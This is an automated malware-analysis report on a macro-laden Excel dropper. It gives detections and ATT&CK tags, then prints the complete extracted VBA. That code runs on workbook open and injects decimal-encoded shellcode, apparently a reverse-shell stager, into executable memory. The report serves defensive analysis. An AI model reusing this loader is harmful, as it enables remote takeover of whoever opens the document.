Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 74c99deb297f686f…

MALICIOUS

Office (OOXML)

15.2 KB Created: 2014-04-27 16:42:18 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2015-09-19
MD5: 5a35dda215b89318f7d54b4791c56940 SHA-1: 15a32f22477a633b4bb54c6ed22f332d864f3fbe SHA-256: 74c99deb297f686f539cd393bb20a12c6a6b678ca1887092a4c59e507d33f16e
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The critical ClamAV heuristic indicates this is a known malicious dropper. The presence of a Workbook_Open macro and VBA code that uses Windows API functions like VirtualAlloc, WriteProcessMemory, and CreateThread strongly suggests the macro is designed to allocate memory, write shellcode to it, and then execute it. This is a common technique for downloading and running a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Dropper.Agent-6388495-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6388495-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5219 bytes
SHA-256: 2afbbb5f6250f779b1ce8788afa50ffe5352cef6ee12ab32de605fb907a73e1d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As LongPtr, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As LongPtr
#Else
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer
Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long
#End If

Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40

Private Sub Workbook_Open()
    #If VBA7 Then
    Dim lpMemory As LongPtr
    Dim lResult As LongPtr
    #Else
    Dim lpMemory As Long
    Dim lResult As Long
    #End If
    Dim sShellCode As String

    sShellCode = ShellCode()
    lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
    lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub

Private Function ParseBytes(strBytes) As String
    Dim aNumbers
    Dim sShellCode As String
    Dim iIter

    sShellCode = ""
    aNumbers = Split(strBytes)
    For iIter = LBound(aNumbers) To UBound(aNumbers)
        sShellCode = sShellCode + Chr(aNumbers(iIter))
    Next

    ParseBytes = sShellCode
End Function

Private Function ShellCode1() As String
    Dim sShellCode As String

    sShellCode = ""
    sShellCode = sShellCode + ParseBytes("252 232 137 0 0 0 96 137 229 49 210 100 139 82 48 139 82 12 139 82 20 139 114 40 15")
    sShellCode = sShellCode + ParseBytes("183 74 38 49 255 49 192 172 60 97 124 2 44 32 193 207 13 1 199 226 240 82 87 139 82")
    sShellCode = sShellCode + ParseBytes("16 139 66 60 1 208 139 64 120 133 192 116 74 1 208 80 139 72 24 139 88 32 1 211 227")
    sShellCode = sShellCode + ParseBytes("60 73 139 52 139 1 214 49 255 49 192 172 193 207 13 1 199 56 224 117 244 3 125 248")
    sShellCode = sShellCode + ParseBytes("59 125 36 117 226 88 139 88 36 1 211 102 139 12 75 139 88 28 1 211 139 4 139 1 208")
    sShellCode = sShellCode + ParseBytes("137 68 36 36 91 91 97 89 90 81 255 224 88 95 90 139 18 235 134 93 104 51 50 0 0 104")
    sShellCode = sShellCode + ParseBytes("119 115 50 95 84 104 76 119 38 7 255 213 184 144 1 0 0 41 196 84 80 104 41 128 107")
    sShellCode = sShellCode + ParseBytes("0 255 213 80 80 80 80 64 80 64 80 104 234 15 223 224 255 213 151 106 5 104 192 168")
    sShellCode = sShellCode + ParseBytes("0 14 104 2 0 17 91 137 230 106 16 86 87 104 153 165 116 97 255 213 133 192 116 12")
    sShellCode = sShellCode + ParseBytes("255 78 8 117 236 104 240 181 162 86 255 213 106 0 106 4 86 87 104 2 217 200 95 255")
    sShellCode = sShellCode + ParseBytes("213 139 54 106 64 104 0 16 0 0 86 106 0 104 88 164 83 229 255 213 147 83 106 0 86")
    sShellCode = sShellCode + ParseBytes("83 87 104 2 217 200 95 255 213 1 195 41 198 133 246 117 236 195")

    ShellCode1 = sShellCode
End Function

Private Function ShellCode() As String
    Dim sShellCode As String

    sShellCode = ""
    sShellCode = sShellCode + ShellCode1()

    ShellCode = sShellCode
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 18432 bytes
SHA-256: b09a5840d5538471399d393cf6c2b03a8cefcb944e6a2311b204a54383ca5d9f

Open this report in the interactive analyzer, or submit your own file for analysis.